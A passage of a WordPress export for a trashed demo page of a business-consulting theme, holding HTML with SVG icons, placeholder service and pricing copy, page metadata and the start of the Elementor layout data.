				<h5><a href="#">Strategy</a></h5>				<p>We’ve been a strategy tmhought leader for nearly five decades</p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled</p>			
        			<a href="#"class="link-details"> Explore More </a>
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Audit and Assurance</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Gross Tax Planning</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Marketing Research</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Оrganizational Audit</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
			<h4>Progress Bars</h4>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h4>Pricing Tables</h4>		
				<h6>basic plan</h6>				<h2><sup>$</sup> 699</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 799</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 899</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
			<h4>Flip Boxes</h4>		
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						01						<h4>Client Learning Programs</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box1-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						02						<h4>Partnership Ecosystem</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box2-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						03						<h4>New Business Innovation</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box3-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
			<h4>Service Boxes</h4>		
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
			<a href="#">Explore More</a>	    
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box2-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box2-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
			<a href="#">Explore More</a>	    
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="#">Explore More</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>624</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 06:56:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 06:56:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[elements__trashed]]></wp:post_name>
		<wp:status><![CDATA[trash]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[625]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8e54f4f","elType":"section","settings":{"padding":{"unit":"px","top":"85","right":"0","bottom":"90","left":"0","isLinked":false}},"elements":[{"id":"d69842b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"374421e","elType":"widget","settings":{"title":"Icon Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2ece61d","elType":"widget","settings":{"icon_boxes":[{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"b6775b1"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":637},"library":"svg"},"title":"Government Services","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"21732ff"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/card.svg","id":638},"library":"svg"},"title":"Consumer Products","des":"Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"e1d2100"}],"icon_size":{"unit":"px","size":48,"sizes":[]},"align":"left","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox_grid"},{"id":"9df710a","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"1178550","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2ba221f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":45,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"e256b55","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"aae9912","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":643},"library":"svg"},"title":"Airlines & Transport","des":"We help financial institutions, from banking and insurance to 